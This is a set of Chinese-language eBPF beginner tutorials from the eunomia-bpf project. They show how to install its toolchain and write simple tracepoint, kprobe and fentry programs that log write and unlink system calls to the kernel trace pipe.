<p>您还可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程源代码,全部内容均已开源。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程二hello-world基本框架和开发流程"><a class="header" href="#ebpf-入门开发实践教程二hello-world基本框架和开发流程">eBPF 入门开发实践教程二:Hello World,基本框架和开发流程</a></h1>
|
||
<p>在本篇博客中,我们将深入探讨eBPF(Extended Berkeley Packet Filter)的基本框架和开发流程。eBPF是一种在Linux内核上运行的强大网络和性能分析工具,它为开发者提供了在内核运行时动态加载、更新和运行用户定义代码的能力。这使得开发者可以实现高效、安全的内核级别的网络监控、性能分析和故障排查等功能。</p>
|
||
<p>本文是eBPF入门开发实践教程的第二篇,我们将重点关注如何编写一个简单的eBPF程序,并通过实际例子演示整个开发流程。在阅读本教程之前,建议您先学习第一篇教程,以便对eBPF的基本概念有个大致的了解。</p>
|
||
<p>在开发eBPF程序时,有多种开发框架可供选择,如 BCC(BPF Compiler Collection)、libbpf、cilium/ebpf、eunomia-bpf 等。虽然不同工具的特点各异,但它们的基本开发流程大致相同。在接下来的内容中,我们将深入了解这些流程,并以 Hello World 程序为例,带领读者逐步掌握eBPF开发的基本技巧。</p>
|
||
<p>本教程将帮助您了解eBPF程序的基本结构、编译和加载过程、用户空间与内核空间的交互方式以及调试与优化技巧。通过学习本教程,您将掌握eBPF开发的基本知识,并为后续进一步学习和实践奠定坚实的基础。</p>
|
||
<h2 id="ebpf开发环境准备与基本开发流程"><a class="header" href="#ebpf开发环境准备与基本开发流程">eBPF开发环境准备与基本开发流程</a></h2>
|
||
<p>在开始编写eBPF程序之前,我们需要准备一个合适的开发环境,并了解eBPF程序的基本开发流程。本部分将详细介绍这些内容。</p>
|
||
<h3 id="安装必要的软件和工具"><a class="header" href="#安装必要的软件和工具">安装必要的软件和工具</a></h3>
|
||
<p>要开发eBPF程序,您需要安装以下软件和工具:</p>
|
||
<ul>
|
||
<li>Linux 内核:由于eBPF是内核技术,因此您需要具备较新版本的Linux内核(推荐4.8及以上版本),以支持eBPF功能。</li>
|
||
<li>LLVM 和 Clang:这些工具用于编译eBPF程序。安装最新版本的LLVM和Clang可以确保您获得最佳的eBPF支持。</li>
|
||
</ul>
|
||
<p>eBPF 程序主要由两部分构成:内核态部分和用户态部分。内核态部分包含 eBPF 程序的实际逻辑,用户态部分负责加载、运行和监控内核态程序。当您选择了合适的开发框架后,如 BCC(BPF Compiler Collection)、libbpf、cilium/ebpf或eunomia-bpf等,您可以开始进行用户态和内核态程序的开发。以 BCC 工具为例,我们将介绍 eBPF 程序的基本开发流程:</p>
|
||
<p>当您选择了合适的开发框架后,如BCC(BPF Compiler Collection)、libbpf、cilium/ebpf或eunomia-bpf等,您可以开始进行用户态和内核态程序的开发。以BCC工具为例,我们将介绍eBPF程序的基本开发流程:</p>
|
||
<ol>
|
||
<li>安装BCC工具:根据您的Linux发行版,按照BCC官方文档的指南安装BCC工具和相关依赖。</li>
|
||
<li>编写eBPF程序(C语言):使用C语言编写一个简单的eBPF程序,例如Hello World程序。该程序可以在内核空间执行并完成特定任务,如统计网络数据包数量。</li>
|
||
<li>编写用户态程序(Python或C等):使用Python、C等语言编写用户态程序,用于加载、运行eBPF程序以及与之交互。在这个程序中,您需要使用BCC提供的API来加载和操作内核态的eBPF程序。</li>
|
||
<li>编译eBPF程序:使用BCC工具,将C语言编写的eBPF程序编译成内核可以执行的字节码。BCC会在运行时动态从源码编译eBPF程序。</li>
|
||
<li>加载并运行eBPF程序:在用户态程序中,使用BCC提供的API加载编译好的eBPF程序到内核空间,然后运行该程序。</li>
|
||
<li>与eBPF程序交互:用户态程序通过BCC提供的API与eBPF程序交互,实现数据收集、分析和展示等功能。例如,您可以使用BCC API读取eBPF程序中的map数据,以获取网络数据包统计信息。</li>
|
||
<li>卸载eBPF程序:当不再需要eBPF程序时,用户态程序应使用BCC API将其从内核空间卸载。</li>
|
||
<li>调试与优化:使用 bpftool 等工具进行eBPF程序的调试和优化,提高程序性能和稳定性。</li>
|
||
</ol>
|
||
<p>通过以上流程,您可以使用BCC工具开发、编译、运行和调试eBPF程序。请注意,其他框架(如libbpf、cilium/ebpf和eunomia-bpf)的开发流程大致相似但略有不同,因此在选择框架时,请参考相应的官方文档和示例。</p>
|
||
<p>通过这个过程,你可以开发出一个能够在内核中运行的 eBPF 程序。eunomia-bpf 是一个开源的 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。它基于 libbpf 的 CO-RE 轻量级开发框架,支持通过用户态 WASM 虚拟机控制 eBPF 程序的加载和执行,并将预编译的 eBPF 程序打包为通用的 JSON 或 WASM 模块进行分发。我们会使用 eunomia-bpf 进行演示。</p>
|
||
<h2 id="下载安装-eunomia-bpf-开发工具"><a class="header" href="#下载安装-eunomia-bpf-开发工具">下载安装 eunomia-bpf 开发工具</a></h2>
|
||
<p>可以通过以下步骤下载和安装 eunomia-bpf:</p>
|
||
<p>下载 ecli 工具,用于运行 eBPF 程序:</p>
|
||
<pre><code class="language-console">$ wget https://aka.pw/bpf-ecli -O ecli && chmod +x ./ecli
|
||
$ ./ecli -h
|
||
Usage: ecli [--help] [--version] [--json] [--no-cache] url-and-args
|
||
</code></pre>
|
||
<p>下载编译器工具链,用于将 eBPF 内核代码编译为 config 文件或 WASM 模块:</p>
|
||
<pre><code class="language-console">$ wget https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc && chmod +x ./ecc
|
||
$ ./ecc -h
|
||
eunomia-bpf compiler
|
||
Usage: ecc [OPTIONS] <SOURCE_PATH> [EXPORT_EVENT_HEADER]
|
||
....
|
||
</code></pre>
|
||
<p>也可以使用 docker 镜像进行编译:</p>
|
||
<pre><code class="language-console">$ docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest # 使用 docker 进行编译。`pwd` 应该包含 *.bpf.c 文件和 *.h 文件。
|
||
export PATH=PATH:~/.eunomia/bin
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into /src/package.json...
|
||
</code></pre>
|
||
<h2 id="hello-world---minimal-ebpf-program"><a class="header" href="#hello-world---minimal-ebpf-program">Hello World - minimal eBPF program</a></h2>
|
||
<p>我们会先从一个简单的 eBPF 程序开始,它会在内核中打印一条消息。我们会使用 eunomia-bpf 的编译器工具链将其编译为 bpf 字节码文件,然后使用 ecli 工具加载并运行该程序。作为示例,我们可以暂时省略用户态程序的部分。</p>
|
||
<pre><code class="language-c">/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */
|
||
#define BPF_NO_GLOBAL_DATA
|
||
#include <linux/bpf.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
|
||
typedef unsigned int u32;
|
||
typedef int pid_t;
|
||
const pid_t pid_filter = 0;
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
SEC("tp/syscalls/sys_enter_write")
|
||
int handle_tp(void *ctx)
|
||
{
|
||
pid_t pid = bpf_get_current_pid_tgid() >> 32;
|
||
if (pid_filter && pid != pid_filter)
|
||
return 0;
|
||
bpf_printk("BPF triggered sys_enter_write from PID %d.\n", pid);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段程序通过定义一个 handle_tp 函数并使用 SEC 宏把它附加到 sys_enter_write tracepoint(即在进入 write 系统调用时执行)。该函数通过使用 bpf_get_current_pid_tgid 和 bpf_printk 函数获取调用 write 系统调用的进程 ID,并在内核日志中打印出来。</p>
|
||
<ul>
|
||
<li><code>bpf_trace_printk()</code>: 一种将信息输出到 trace_pipe(/sys/kernel/debug/tracing/trace_pipe)的简单机制(示例代码中的 bpf_printk 是 libbpf 对它的宏封装)。在一些简单用例中这样使用没有问题,但它也有一些限制:最多 3 个参数;只能有一个 %s(即字符串);同时 trace_pipe 在内核中全局共享,其他并行使用 trace_pipe 的程序有可能会将 trace_pipe 的输出扰乱。一个更好的方式是通过 BPF_PERF_OUTPUT(),稍后将会讲到。</li>
|
||
<li><code>void *ctx</code>:ctx本来是具体类型的参数, 但是由于我们这里没有使用这个参数,因此就将其写成void *类型。</li>
|
||
<li><code>return 0;</code>:必须这样,返回 0(如果想知道原因,参考 #139 <a href="https://github.com/iovisor/bcc/issues/139">https://github.com/iovisor/bcc/issues/139</a>)。</li>
|
||
</ul>
|
||
<p>要编译和运行这段程序,可以使用 ecc 工具和 ecli 命令。首先在 Ubuntu/Debian 上,执行以下命令:</p>
|
||
<pre><code class="language-shell">sudo apt install clang llvm
|
||
</code></pre>
|
||
<p>使用 ecc 编译程序:</p>
|
||
<pre><code class="language-console">$ ./ecc minimal.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>或使用 docker 镜像进行编译:</p>
|
||
<pre><code class="language-shell">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>然后使用 ecli 运行编译后的程序:</p>
|
||
<pre><code class="language-console">$ sudo ./ecli run package.json
|
||
Runing eBPF program...
|
||
</code></pre>
|
||
<p>运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe | grep "BPF triggered sys_enter_write"
|
||
<...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: BPF triggered sys_enter_write from PID 3840345.
|
||
<...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: BPF triggered sys_enter_write from PID 3840345.
|
||
</code></pre>
|
||
<p>按 Ctrl+C 停止 ecli 进程之后,可以看到对应的输出也停止。</p>
|
||
<p>注意:如果正在使用的 Linux 发行版(例如 Ubuntu)默认情况下没有启用跟踪子系统,可能看不到任何输出,可以使用以下指令打开这个功能:</p>
|
||
<pre><code class="language-console">$ sudo su
|
||
# echo 1 > /sys/kernel/debug/tracing/tracing_on
|
||
</code></pre>
|
||
<h2 id="ebpf-程序的基本框架"><a class="header" href="#ebpf-程序的基本框架">eBPF 程序的基本框架</a></h2>
|
||
<p>如上所述, eBPF 程序的基本框架包括:</p>
|
||
<ul>
|
||
<li>包含头文件:需要包含 <linux/bpf.h> 和 <bpf/bpf_helpers.h> 等头文件。</li>
|
||
<li>定义许可证:需要定义许可证,通常使用 "Dual BSD/GPL"。</li>
|
||
<li>定义 BPF 函数:需要定义一个 BPF 函数,例如其名称为 handle_tp,其参数为 void *ctx,返回值为 int。通常用 C 语言编写。</li>
|
||
<li>使用 BPF 助手函数:在 BPF 函数中,可以使用 BPF 助手函数,例如 bpf_get_current_pid_tgid() 和 bpf_printk()。</li>
|
||
<li>返回值:BPF 函数需要返回一个 int 值,本例中返回 0。</li>
|
||
</ul>
|
||
<h2 id="tracepoints"><a class="header" href="#tracepoints">tracepoints</a></h2>
|
||
<p>跟踪点(tracepoints)是内核静态插桩技术,跟踪点在技术上只是放置在内核源代码中的跟踪函数,实际上就是在源码中插入的一些带有控制条件的探测点,这些探测点允许事后再添加处理函数。比如在内核中,最常见的静态跟踪方法就是 printk,即输出日志。又比如:在系统调用、调度程序事件、文件系统操作和磁盘 I/O 的开始和结束时都有跟踪点。跟踪点于 2009 年在 Linux 2.6.32 版本中首次提供,是一种稳定的 API,数量有限。</p>
|
||
<h2 id="github-模板轻松构建-ebpf-项目和开发环境"><a class="header" href="#github-模板轻松构建-ebpf-项目和开发环境">GitHub 模板:轻松构建 eBPF 项目和开发环境</a></h2>
|
||
<p>面对创建一个 eBPF 项目,您是否对如何开始搭建环境以及选择编程语言感到困惑?别担心,我们为您准备了一系列 GitHub 模板,以便您快速启动一个全新的eBPF项目。只需在GitHub上点击 <code>Use this template</code> 按钮,即可开始使用。</p>
|
||
<ul>
|
||
<li><a href="https://github.com/eunomia-bpf/libbpf-starter-template">https://github.com/eunomia-bpf/libbpf-starter-template</a>:基于C语言和 libbpf 框架的eBPF项目模板</li>
|
||
<li><a href="https://github.com/eunomia-bpf/cilium-ebpf-starter-template">https://github.com/eunomia-bpf/cilium-ebpf-starter-template</a>:基于C语言和cilium/ebpf框架的eBPF项目模板</li>
|
||
<li><a href="https://github.com/eunomia-bpf/libbpf-rs-starter-template">https://github.com/eunomia-bpf/libbpf-rs-starter-template</a>:基于Rust语言和libbpf-rs框架的eBPF项目模板</li>
|
||
<li><a href="https://github.com/eunomia-bpf/eunomia-template">https://github.com/eunomia-bpf/eunomia-template</a>:基于C语言和eunomia-bpf框架的eBPF项目模板</li>
|
||
</ul>
|
||
<p>这些启动模板包含以下功能:</p>
|
||
<ul>
|
||
<li>一个 Makefile,让您可以一键构建项目</li>
|
||
<li>一个 Dockerfile,用于为您的 eBPF 项目自动创建一个容器化环境并发布到 Github Packages</li>
|
||
<li>GitHub Actions,用于自动化构建、测试和发布流程</li>
|
||
<li>eBPF 开发所需的所有依赖项</li>
|
||
</ul>
|
||
<blockquote>
|
||
<p>通过将现有仓库设置为模板,您和其他人可以快速生成具有相同基础结构的新仓库,从而省去了手动创建和配置的繁琐过程。借助 GitHub 模板仓库,开发者可以专注于项目的核心功能和逻辑,而无需为基础设置和结构浪费时间。更多关于模板仓库的信息,请参阅官方文档:<a href="https://docs.github.com/en/repositories/creating-and-managing-repositories/creating-a-template-repository">https://docs.github.com/en/repositories/creating-and-managing-repositories/creating-a-template-repository</a></p>
|
||
</blockquote>
|
||
<h2 id="总结"><a class="header" href="#总结">总结</a></h2>
|
||
<p>eBPF 程序的开发和使用流程可以概括为如下几个步骤:</p>
|
||
<ul>
|
||
<li>定义 eBPF 程序的接口和类型:这包括定义 eBPF 程序的接口函数,定义和实现 eBPF 内核映射(maps)和共享内存(perf events),以及定义和使用 eBPF 内核帮助函数(helpers)。</li>
|
||
<li>编写 eBPF 程序的代码:这包括编写 eBPF 程序的主要逻辑,实现 eBPF 内核映射的读写操作,以及使用 eBPF 内核帮助函数。</li>
|
||
<li>编译 eBPF 程序:这包括使用 eBPF 编译器(例如 clang)将 eBPF 程序代码编译为 eBPF 字节码,并生成可执行的 eBPF 内核模块。ecc 本质上也是调用 clang 编译器来编译 eBPF 程序。</li>
|
||
<li>加载 eBPF 程序到内核:这包括将编译好的 eBPF 内核模块加载到 Linux 内核中,并将 eBPF 程序附加到指定的内核事件上。</li>
|
||
<li>使用 eBPF 程序:这包括监测 eBPF 程序的运行情况,并使用 eBPF 内核映射和共享内存进行数据交换和共享。</li>
|
||
<li>在实际开发中,还可能需要进行其他的步骤,例如配置编译和加载参数,管理 eBPF 内核模块和内核映射,以及使用其他高级功能等。</li>
|
||
</ul>
|
||
<p>需要注意的是,BPF 程序的执行是在内核空间进行的,因此需要使用特殊的工具和技术来编写、编译和调试 BPF 程序。eunomia-bpf 是一个开源的 BPF 编译器和工具包,它可以帮助开发者快速和简单地编写和运行 BPF 程序。</p>
|
||
<p>您还可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程,全部内容均已开源。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程二在-ebpf-中使用-kprobe-监测捕获-unlink-系统调用"><a class="header" href="#ebpf-入门开发实践教程二在-ebpf-中使用-kprobe-监测捕获-unlink-系统调用">eBPF 入门开发实践教程二:在 eBPF 中使用 kprobe 监测捕获 unlink 系统调用</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第二篇,在 eBPF 中使用 kprobe 捕获 unlink 系统调用。本文会先讲解关于 kprobes 的基本概念和技术背景,然后介绍如何在 eBPF 中使用 kprobe 捕获 unlink 系统调用。</p>
|
||
<h2 id="kprobes-技术背景"><a class="header" href="#kprobes-技术背景">kprobes 技术背景</a></h2>
|
||
<p>开发人员在内核或者模块的调试过程中,往往需要知道其中的一些函数有无被调用、何时被调用、执行是否正确以及函数的入参和返回值是什么等等。比较简单的做法是在内核代码对应的函数中添加日志打印信息,但这种方式往往需要重新编译内核或模块,重新启动设备之类的,操作较为复杂甚至可能会破坏原有的代码执行过程。</p>
|
||
<p>而利用 kprobes 技术,用户可以定义自己的回调函数,然后在内核或者模块中几乎所有的函数中(有些函数是不可探测的,例如kprobes自身的相关实现函数,后文会有详细说明)动态地插入探测点,当内核执行流程执行到指定的探测函数时,会调用该回调函数,用户即可收集所需的信息了,同时内核最后还会回到原本的正常执行流程。如果用户已经收集足够的信息,不再需要继续探测,则同样可以动态地移除探测点。因此 kprobes 技术具有对内核执行流程影响小和操作方便的优点。</p>
|
||
<p>kprobes 技术包括的3种探测手段分别是 kprobe、jprobe 和 kretprobe。首先 kprobe 是最基本的探测方式,是实现后两种的基础,它可以在任意的位置放置探测点(就连函数内部的某条指令处也可以),它提供了探测点的调用前、调用后和内存访问出错3种回调方式,分别是 <code>pre_handler</code>、<code>post_handler</code> 和 <code>fault_handler</code>,其中 <code>pre_handler</code> 函数将在被探测指令被执行前回调,<code>post_handler</code> 会在被探测指令执行完毕后回调(注意不是被探测函数),<code>fault_handler</code> 会在内存访问出错时被调用;jprobe 基于 kprobe 实现,它用于获取被探测函数的入参值;最后 kretprobe 从名字中就可以看出其用途了,它同样基于 kprobe 实现,用于获取被探测函数的返回值。</p>
|
||
<p>kprobes 的技术原理并不仅仅包含纯软件的实现方案,它也需要硬件架构提供支持。其中涉及硬件架构相关的是 CPU 的异常处理和单步调试技术,前者用于让程序的执行流程陷入到用户注册的回调函数中去,而后者则用于单步执行被探测点指令,因此并不是所有的架构均支持 kprobes。目前 kprobes 技术已经支持多种架构,包括 i386、x86_64、ppc64、ia64、sparc64、arm、ppc 和 mips(有些架构实现可能并不完全,具体可参考内核的 Documentation/kprobes.txt)。</p>
|
||
<p>kprobes 的特点与使用限制:</p>
|
||
<ol>
|
||
<li>kprobes 允许在同一个被探测位置注册多个 kprobe,但是目前 jprobe 却不可以;同时也不允许以其他的 jprobe 回调函数和 kprobe 的 <code>post_handler</code> 回调函数作为被探测点。</li>
|
||
<li>一般情况下,可以探测内核中的任何函数,包括中断处理函数。不过在 kernel/kprobes.c 和 arch/*/kernel/kprobes.c 程序中用于实现 kprobes 自身的函数是不允许被探测的,另外还有<code>do_page_fault</code> 和 <code>notifier_call_chain</code>;</li>
|
||
<li>如果以一个内联函数为探测点,则 kprobes 可能无法保证对该函数的所有实例都注册探测点。由于 gcc 可能会自动将某些函数优化为内联函数,因此可能无法达到用户预期的探测效果;</li>
|
||
<li>一个探测点的回调函数可能会修改被探测函数的运行上下文,例如通过修改内核的数据结构或者保存于<code>struct pt_regs</code>结构体中的触发探测器之前的寄存器信息。因此 kprobes 可以被用来安装 bug 修复代码或者注入故障测试代码;</li>
|
||
<li>kprobes 会避免在处理探测点函数时再次调用另一个探测点的回调函数,例如在<code>printk()</code>函数上注册了探测点,而在它的回调函数中可能会再次调用<code>printk</code>函数,此时将不再触发<code>printk</code>探测点的回调,仅仅是增加了<code>kprobe</code>结构体中<code>nmissed</code>字段的数值;</li>
|
||
<li>在 kprobes 的注册和注销过程中不会使用 mutex 锁和动态的申请内存;</li>
|
||
<li>kprobes 回调函数的运行期间是关闭内核抢占的,同时也可能在关闭中断的情况下执行,具体要视CPU架构而定。因此不论在何种情况下,在回调函数中不要调用会放弃 CPU 的函数(如信号量、mutex 锁等);</li>
|
||
<li>kretprobe 通过替换返回地址为预定义的 trampoline 的地址来实现,因此栈回溯和 gcc 内嵌函数<code>__builtin_return_address()</code>调用将返回 trampoline 的地址而不是真正的被探测函数的返回地址;</li>
|
||
<li>如果一个函数的调用次数和返回次数不相等,则在类似这样的函数上注册 kretprobe 将可能不会达到预期的效果,例如<code>do_exit()</code>函数会存在问题,而<code>do_execve()</code>函数和<code>do_fork()</code>函数不会;</li>
|
||
<li>当在进入和退出一个函数时,如果 CPU 运行在非当前任务所有的栈上,那么往该函数上注册 kretprobe 可能会导致不可预料的后果,因此,kprobes 不支持在 X86_64 的结构下为<code>__switch_to()</code>函数注册 kretprobe,将直接返回<code>-EINVAL</code>。</li>
|
||
</ol>
|
||
<h2 id="kprobe-示例"><a class="header" href="#kprobe-示例">kprobe 示例</a></h2>
|
||
<p>完整代码如下:</p>
|
||
<pre><code class="language-c">#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
SEC("kprobe/do_unlinkat")
|
||
int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name)
|
||
{
|
||
pid_t pid;
|
||
const char *filename;
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
filename = BPF_CORE_READ(name, name);
|
||
bpf_printk("KPROBE ENTRY pid = %d, filename = %s\n", pid, filename);
|
||
return 0;
|
||
}
|
||
|
||
SEC("kretprobe/do_unlinkat")
|
||
int BPF_KRETPROBE(do_unlinkat_exit, long ret)
|
||
{
|
||
pid_t pid;
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
bpf_printk("KPROBE EXIT: pid = %d, ret = %ld\n", pid, ret);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段代码是一个简单的 eBPF 程序,用于监测和捕获在 Linux 内核中执行的 unlink 系统调用。unlink 系统调用的功能是删除一个文件,这个 eBPF 程序通过使用 kprobe(内核探针)在<code>do_unlinkat</code>函数的入口和退出处放置钩子,实现对该系统调用的跟踪。</p>
|
||
<p>首先,我们导入必要的头文件,如 vmlinux.h,bpf_helpers.h,bpf_tracing.h 和 bpf_core_read.h。接着,我们定义许可证,以允许程序在内核中运行。</p>
|
||
<pre><code class="language-c">#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
</code></pre>
|
||
<p>接下来,我们定义一个名为<code>BPF_KPROBE(do_unlinkat)</code>的 kprobe,当进入<code>do_unlinkat</code>函数时,它会被触发。该函数接受两个参数:<code>dfd</code>(文件描述符)和<code>name</code>(文件名结构体指针)。在这个 kprobe 中,我们获取当前进程的 PID(进程标识符),然后读取文件名。最后,我们使用<code>bpf_printk</code>函数在内核日志中打印 PID 和文件名。</p>
|
||
<pre><code class="language-c">SEC("kprobe/do_unlinkat")
|
||
int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name)
|
||
{
|
||
pid_t pid;
|
||
const char *filename;
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
filename = BPF_CORE_READ(name, name);
|
||
bpf_printk("KPROBE ENTRY pid = %d, filename = %s\n", pid, filename);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>接下来,我们定义一个名为<code>BPF_KRETPROBE(do_unlinkat_exit)</code>的 kretprobe,当从<code>do_unlinkat</code>函数退出时,它会被触发。这个 kretprobe 的目的是捕获函数的返回值(ret)。我们再次获取当前进程的 PID,并使用<code>bpf_printk</code>函数在内核日志中打印 PID 和返回值。</p>
|
||
<pre><code class="language-c">SEC("kretprobe/do_unlinkat")
|
||
int BPF_KRETPROBE(do_unlinkat_exit, long ret)
|
||
{
|
||
pid_t pid;
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
bpf_printk("KPROBE EXIT: pid = %d, ret = %ld\n", pid, ret);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。</p>
|
||
<p>要编译这个程序,请使用 ecc 工具:</p>
|
||
<pre><code class="language-console">$ ecc kprobe-link.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>然后运行:</p>
|
||
<pre><code class="language-console">sudo ecli run package.json
|
||
</code></pre>
|
||
<p>在另外一个窗口中:</p>
|
||
<pre><code class="language-shell">touch test1
|
||
rm test1
|
||
touch test2
|
||
rm test2
|
||
</code></pre>
|
||
<p>在 /sys/kernel/debug/tracing/trace_pipe 文件中,应该能看到类似下面的 kprobe 演示输出:</p>
|
||
<pre><code class="language-shell">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
rm-9346 [005] d..3 4710.951696: bpf_trace_printk: KPROBE ENTRY pid = 9346, filename = test1
|
||
 rm-9346 [005] d..4 4710.951819: bpf_trace_printk: KPROBE EXIT: pid = 9346, ret = 0
|
||
 rm-9346 [005] d..3 4710.951852: bpf_trace_printk: KPROBE ENTRY pid = 9346, filename = test2
|
||
 rm-9346 [005] d..4 4710.951895: bpf_trace_printk: KPROBE EXIT: pid = 9346, ret = 0
|
||
</code></pre>
|
||
<h2 id="总结-1"><a class="header" href="#总结-1">总结</a></h2>
|
||
<p>通过本文的示例,我们学习了如何使用 eBPF 的 kprobe 和 kretprobe 捕获 unlink 系统调用。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
<p>本文是 eBPF 入门开发实践教程的第二篇。下一篇文章将介绍如何在 eBPF 中使用 fentry 监测捕获 unlink 系统调用。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程三在-ebpf-中使用-fentry-监测捕获-unlink-系统调用"><a class="header" href="#ebpf-入门开发实践教程三在-ebpf-中使用-fentry-监测捕获-unlink-系统调用">eBPF 入门开发实践教程三:在 eBPF 中使用 fentry 监测捕获 unlink 系统调用</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第三篇,在 eBPF 中使用 fentry 捕获 unlink 系统调用。</p>
|
||
<h2 id="fentry"><a class="header" href="#fentry">Fentry</a></h2>
|
||
<p>fentry(function entry)和fexit(function exit)是eBPF(扩展的伯克利包过滤器)中的两种探针类型,用于在Linux内核函数的入口和退出处进行跟踪。它们允许开发者在内核函数执行的特定阶段收集信息、修改参数或观察返回值。这种跟踪和监控功能在性能分析、故障排查和安全分析等场景中非常有用。</p>
|
||
<p>与 kprobes 相比,fentry 和 fexit 程序有更高的性能和可用性。在这个例子中,我们可以直接访问函数的指针参数,就像在普通的 C 代码中一样,而不需要使用各种读取帮助程序。fexit 和 kretprobe 程序最大的区别在于,fexit 程序可以访问函数的输入参数和返回值,而 kretprobe 只能访问返回值。从 5.5 内核开始,fentry 和 fexit 对 eBPF 程序可用。</p>
|
||
<pre><code class="language-c">#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
SEC("fentry/do_unlinkat")
|
||
int BPF_PROG(do_unlinkat, int dfd, struct filename *name)
|
||
{
|
||
pid_t pid;
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
bpf_printk("fentry: pid = %d, filename = %s\n", pid, name->name);
|
||
return 0;
|
||
}
|
||
|
||
SEC("fexit/do_unlinkat")
|
||
int BPF_PROG(do_unlinkat_exit, int dfd, struct filename *name, long ret)
|
||
{
|
||
pid_t pid;
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
bpf_printk("fexit: pid = %d, filename = %s, ret = %ld\n", pid, name->name, ret);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段程序是用C语言编写的eBPF(扩展的伯克利包过滤器)程序,它使用BPF的fentry和fexit探针来跟踪Linux内核函数do_unlinkat。在这个教程中,我们将以这段程序作为示例,让您学会如何在eBPF中使用fentry监测捕获unlink系统调用。</p>
|
||
<p>程序包含以下部分:</p>
|
||
<ol>
|
||
<li>包含头文件:包括vmlinux.h(用于访问内核数据结构)、bpf/bpf_helpers.h(包含eBPF帮助函数)、bpf/bpf_tracing.h(用于eBPF跟踪相关功能)。</li>
|
||
<li>定义许可证:这里定义了一个名为LICENSE的字符数组,包含许可证信息"Dual BSD/GPL"。</li>
|
||
<li>定义fentry探针:我们定义了一个名为BPF_PROG(do_unlinkat)的fentry探针,该探针在do_unlinkat函数的入口处被触发。这个探针获取当前进程的PID(进程ID)并将其与文件名一起打印到内核日志。</li>
|
||
<li>定义fexit探针:我们还定义了一个名为BPF_PROG(do_unlinkat_exit)的fexit探针,该探针在do_unlinkat函数的退出处被触发。与fentry探针类似,这个探针也会获取当前进程的PID并将其与文件名和返回值一起打印到内核日志。</li>
|
||
</ol>
|
||
